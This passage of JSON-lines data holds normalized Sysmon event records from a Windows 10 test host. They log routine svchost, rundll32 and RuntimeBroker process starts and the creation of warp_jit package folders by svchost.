"C:\\Windows\\System32\\RuntimeBroker.exe -Embedding", "object.process.parent.fullpath": "c:\\windows\\system32\\runtimebroker.exe", "object.process.parent.guid": "747f3d96-b776-5ea4-0000-001025270b00", "object.process.parent.id": "6924", "object.process.parent.name": "runtimebroker.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\program files\\windowsapps\\microsoft.microsoftofficehub_18.2002.1101.0_x64__8wekyb3d8bbwe\\", "object.process.version": "18.2002.1101.0", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.502Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "119707", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:34.611Z", "type": "raw", "uuid": "80df3887-10d2-43d6-afb7-612188970788"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:40.6929242Z\"},\"EventRecordID\":\"27840\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:34.549\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b776-5ea4-0000-0010a74d0b00}\"},{\"Name\":\"ProcessId\",\"text\":\"6964\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b776-5ea4-0000-0010a74d0b00", "object.process.hash.imphash": 
"247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "6964", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:34.549Z", "type": "raw", "uuid": "d100e07f-0543-4902-b5ee-382080b6384c"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:37.2091896Z\"},\"EventRecordID\":\"27803\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:27.149\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b76f-5ea4-0000-0010624d0600}\"},{\"Name\":\"ProcessId\",\"text\":\"5840\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\rundll32.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows host process (Rundll32)\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"RUNDLL32.EXE\"},{\"Name\":\"CommandLine\",\"text\":\"rundll32.exe 
AppXDeploymentExtensions.OneCore.dll,ShellRefresh\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-00209bd30100}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d39b\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b769-5ea4-0000-001000800300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4472\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k wsappx -p -s AppXSvc\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b767-5ea4-0000-00209bd30100", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "119707", "object.process.cmdline": "rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh", "object.process.cwd": 
"C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\rundll32.exe", "object.process.guid": "747f3d96-b76f-5ea4-0000-0010624d0600", "object.process.hash.imphash": "F27A7FC3A53E74F45BE370131953896A", "object.process.hash.md5": "C73BA51880F5A7FB20C84185A23212EF", "object.process.hash.sha1": "F3BA3415DD068A8871F285570BEA2E29874CBFF1", "object.process.hash.sha256": "01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A", "object.process.id": "5840", "object.process.meta": "Description:Windows host process (Rundll32) | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "rundll32.exe", "object.process.original_name": "RUNDLL32.EXE", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k wsappx -p -s AppXSvc", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-b769-5ea4-0000-001000800300", "object.process.parent.id": "4472", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "119707", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:27.149Z", "type": "raw", "uuid": "c1fcfe54-7ecd-4af4-becf-1f9fdf8aca31"} +{"action": "create", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"11\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"11\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:36.9848187Z\"},\"EventRecordID\":\"27797\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:26.766\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b76e-5ea4-0000-001034090600}\"},{\"Name\":\"ProcessId\",\"text\":\"5632\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"TargetFilename\",\"text\":\"C:\\\\Windows\\\\ServiceProfiles\\\\LocalService\\\\AppData\\\\Local\\\\Packages\\\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\\\\AC\\\\INetCookies\"},{\"Name\":\"CreationUtcTime\",\"text\":\"2020-04-25 22:19:26.766\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": 
"c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\packages\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\\ac\\inetcookies", "object.name": "inetcookies", "object.path": "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\packages\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\\ac\\", "object.property": "creation time", "object.value": "2020-04-25T22:19:26.766Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\svchost.exe", "subject.process.guid": "747f3d96-b76e-5ea4-0000-001034090600", "subject.process.id": "5632", "subject.process.name": "svchost.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:26.766Z", "type": "raw", "uuid": "78e924f8-36e1-4151-bf97-f614aa89f4a8"} +{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"11\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"11\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:36.9847196Z\"},\"EventRecordID\":\"27796\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 
22:19:26.766\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b76e-5ea4-0000-001034090600}\"},{\"Name\":\"ProcessId\",\"text\":\"5632\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"TargetFilename\",\"text\":\"C:\\\\Windows\\\\ServiceProfiles\\\\LocalService\\\\AppData\\\\Local\\\\Packages\\\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\\\\AC\\\\INetHistory\"},{\"Name\":\"CreationUtcTime\",\"text\":\"2020-04-25 22:19:26.766\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\packages\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\\ac\\inethistory", "object.name": "inethistory", "object.path": "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\packages\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\\ac\\", "object.property": "creation time", "object.value": "2020-04-25T22:19:26.766Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\svchost.exe", "subject.process.guid": "747f3d96-b76e-5ea4-0000-001034090600", "subject.process.id": "5632", "subject.process.name": "svchost.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", 
"taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:26.766Z", "type": "raw", "uuid": "ec72fc44-870e-4ad2-b13f-2abb31fd0ee6"} +{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"11\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"11\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:36.9846501Z\"},\"EventRecordID\":\"27795\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:26.766\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b76e-5ea4-0000-001034090600}\"},{\"Name\":\"ProcessId\",\"text\":\"5632\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"TargetFilename\",\"text\":\"C:\\\\Windows\\\\ServiceProfiles\\\\LocalService\\\\AppData\\\\Local\\\\Packages\\\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\\\\AC\\\\INetCache\"},{\"Name\":\"CreationUtcTime\",\"text\":\"2020-04-25 22:19:26.766\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", 
"normalized": true, "object": "file_object", "object.fullpath": "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\packages\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\\ac\\inetcache", "object.name": "inetcache", "object.path": "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\packages\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\\ac\\", "object.property": "creation time", "object.value": "2020-04-25T22:19:26.766Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\svchost.exe", "subject.process.guid": "747f3d96-b76e-5ea4-0000-001034090600", "subject.process.id": "5632", "subject.process.name": "svchost.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:26.766Z", "type": "raw", "uuid": "e0b176e9-8b9c-4682-bfd0-cfbbd935f90d"} +{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"11\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"11\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:36.9845792Z\"},\"EventRecordID\":\"27794\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 
22:19:26.766\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b76e-5ea4-0000-001034090600}\"},{\"Name\":\"ProcessId\",\"text\":\"5632\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"TargetFilename\",\"text\":\"C:\\\\Windows\\\\ServiceProfiles\\\\LocalService\\\\AppData\\\\Local\\\\Packages\\\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\\\\AC\\\\Temp\"},{\"Name\":\"CreationUtcTime\",\"text\":\"2020-04-25 22:19:26.766\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\packages\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\\ac\\temp", "object.name": "temp", "object.path": "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\packages\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\\ac\\", "object.property": "creation time", "object.value": "2020-04-25T22:19:26.766Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\svchost.exe", "subject.process.guid": "747f3d96-b76e-5ea4-0000-001034090600", "subject.process.id": "5632", "subject.process.name": "svchost.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": 
"26.0.215-release-26.0", "time": "2020-04-25T22:19:26.766Z", "type": "raw", "uuid": "bbd93aee-556d-4153-92cb-fec3c7b0d35b"} +{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"11\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"11\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:36.9843101Z\"},\"EventRecordID\":\"27793\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:26.750\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b76e-5ea4-0000-001034090600}\"},{\"Name\":\"ProcessId\",\"text\":\"5632\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"TargetFilename\",\"text\":\"C:\\\\Windows\\\\ServiceProfiles\\\\LocalService\\\\AppData\\\\Local\\\\Packages\\\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\\\\AC\"},{\"Name\":\"CreationUtcTime\",\"text\":\"2020-04-25 22:19:26.750\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", 
"object.fullpath": "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\packages\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\\ac", "object.name": "ac", "object.path": "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\packages\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\\", "object.property": "creation time", "object.value": "2020-04-25T22:19:26.750Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\svchost.exe", "subject.process.guid": "747f3d96-b76e-5ea4-0000-001034090600", "subject.process.id": "5632", "subject.process.name": "svchost.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:26.750Z", "type": "raw", "uuid": "f12acd47-4470-4740-b1c9-42e18b7e0b80"} +{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"11\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"11\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:36.9841653Z\"},\"EventRecordID\":\"27792\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 
22:19:26.750\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b76e-5ea4-0000-001034090600}\"},{\"Name\":\"ProcessId\",\"text\":\"5632\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"TargetFilename\",\"text\":\"C:\\\\Windows\\\\ServiceProfiles\\\\LocalService\\\\AppData\\\\Local\\\\Packages\\\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\"},{\"Name\":\"CreationUtcTime\",\"text\":\"2020-04-25 22:19:26.750\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\packages\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe", "object.name": "warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe", "object.path": "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\packages\\", "object.property": "creation time", "object.value": "2020-04-25T22:19:26.750Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "process", "subject.process.fullpath": 